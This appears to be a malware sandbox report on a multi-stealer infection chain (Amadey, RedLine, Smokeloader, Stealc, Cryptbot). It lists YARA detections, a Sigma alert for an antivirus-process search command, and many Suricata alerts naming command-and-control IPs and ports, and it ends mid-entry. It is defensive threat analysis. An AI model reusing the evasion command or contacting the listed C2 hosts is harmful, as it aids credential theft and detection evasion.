25.2.RegAsm.exe.482060.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
25.2.RegAsm.exe.482060.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x43893:$s1: file:/// 0x437ef:$s2: {11111-22222-10009-11112} 0x43823:$s3: {11111-22222-50001-00000} 0x4084e:$s4: get_Module 0x3af3c:$s5: Reverse 0x3bc37:$s6: BlockCopy 0x3af0a:$s7: ReadByte 0x438a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
25.2.RegAsm.exe.436060.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.2.GOLD.exe.34d5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
25.2.RegAsm.exe.482060.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
25.2.RegAsm.exe.482060.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
25.2.RegAsm.exe.482060.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
19.2.GOLD.exe.34d5570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
25.2.RegAsm.exe.400000.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
25.2.RegAsm.exe.400000.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
25.2.RegAsm.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
25.2.RegAsm.exe.400000.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xc48f3:$s1: file:/// 0xc484f:$s2: {11111-22222-10009-11112} 0xc4883:$s3: {11111-22222-50001-00000} 0xc18ae:$s4: get_Module 0x52fe2:$s5: Reverse 0xbbf9c:$s5: Reverse 0xbcc97:$s6: BlockCopy 0xbbf6a:$s7: ReadByte 0xc4905:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.2.axplong.exe.5c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.axplong.exe.5c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.PQ2AUndsdb.exe.c30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ParentCommandLine: "C:\Users\user\Desktop\PQ2AUndsdb.exe", ParentImage: C:\Users\user\Desktop\PQ2AUndsdb.exe, ParentProcessId: 6596, ParentProcessName: PQ2AUndsdb.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , ProcessId: 2516, ProcessName: axplong.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3424, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 5248, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:28.063888+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:22.844974+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:16.131320+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:16.131320+0200
SID:	2046045
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:25.018784+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:28.307381+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:24.590179+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:56.281209+0200
SID:	2039103
Severity:	1
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:24.864456+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:26.501859+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:26.776231+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:29.492796+0200
SID:	2803304
Severity:	3
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.7 - Destination IP: 195.133.48.136

Timestamp:	2024-08-26T23:29:44.026633+0200
SID:	2054350
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:28.000626+0200
SID:	2803304
Severity:	3
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:25.072513+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:31.323400+0200
SID:	2803304
Severity:	3
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:42.700639+0200
SID:	2803305
Severity:	3
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:11.284368+0200
SID:	2044696
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:01.845118+0200
SID:	2039103
Severity:	1
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:22.604211+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:31.721092+0200
SID:	2044696
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:04.074869+0200
SID:	2039103
Severity:	1
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:04.074869+0200
SID:	2851815
Severity:	1
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:24.792974+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:21.231670+0200
SID:	2803304
Severity:	3
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 65.21.18.51 - Destination IP: 192.168.2.7

Timestamp:	2024-08-26T23:29:17.043719+0200
SID:	2043234
Severity:	1
Source Port:	45580
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:17.171446+0200
SID:	2803305
Severity:	3
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 95.179.163.21 - Destination IP: 192.168.2.7

Timestamp:	2024-08-26T23:29:22.122458+0200
SID:	2046056
Severity:	1
Source Port:	29257
Destination Port:	49728
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:58.485468+0200
SID:	2039103
Severity:	1
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:58.485468+0200
SID:	2851815
Severity:	1
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:19.513258+0200
SID:	2044243
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:23.692597+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:05.185326+0200
SID:	2039103
Severity:	1
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:05.185326+0200
SID:	2851815
Severity:	1
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.16 - Destination IP: 192.168.2.7

Timestamp:	2024-08-26T23:29:08.977468+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:27.966270+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:31.975646+0200
SID:	2803305
Severity:	3
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:48.457245+0200
SID:	2039103
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:26.523924+0200
SID:	2044696
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 185.215.113.17 - Destination IP: 192.168.2.7

Timestamp:	2024-08-26T23:29:19.899040+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 95.179.163.21 - Destination IP: 192.168.2.7

Timestamp:	2024-08-26T23:29:16.321261+0200
SID:	2043234
Severity:	1
Source Port:	29257
Destination Port:	49728
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 65.21.18.51 - Destination IP: 192.168.2.7

Timestamp:	2024-08-26T23:29:22.655054+0200
SID:	2046056
Severity:	1
Source Port:	45580
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:28.824533+0200
SID:	2803304
Severity:	3
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:47.367293+0200
SID:	2039103
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:47.367293+0200
SID:	2851815
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:28.283550+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:16.922402+0200
SID:	2044696
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:27.873296+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:24.364401+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:21.378364+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:22.183729+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:22.648788+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:00.735303+0200
SID:	2039103
Severity:	1
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:25.895364+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:27.525890+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:02.960203+0200
SID:	2039103
Severity:	1
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:27.084431+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:26.767811+0200
SID:	2803305
Severity:	3
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:08.695889+0200
SID:	2856147
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.7 - Destination IP: 195.133.48.136

Timestamp:	2024-08-26T23:29:39.406305+0200
SID:	2054350
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:26.583502+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:19.398310+0200
SID:	2803305
Severity:	3
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:29.397605+0200
SID:	2044696
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:28.698663+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:07.641514+0200
SID:	2039103
Severity:	1
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:29.641610+0200
SID:	2803305
Severity:	3
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:51.753248+0200
SID:	2039103
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:51.753248+0200
SID:	2851815
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:14.224074+0200
SID:	2044696
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:25.275879+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:59.611044+0200
SID:	2039103
Severity:	1
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:31.946147+0200
SID:	2803304
Severity:	3
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:22.316164+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:26.092719+0200
SID:	2803304
Severity:	3
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:28.901663+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:23.860996+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:42.456256+0200
SID:	2044696
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:16.842296+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:16.842296+0200
SID:	2046045
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:23.042504+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:26.177860+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:23.476935+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:54.066485+0200
SID:	2039103
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 - Source IP: 192.168.2.7 - Destination IP: 195.133.48.136

Timestamp:	2024-08-26T23:29:35.527199+0200
SID:	2054350
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:06.273434+0200
SID:	2039103
Severity:	1
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:30:06.273434+0200
SID:	2851815
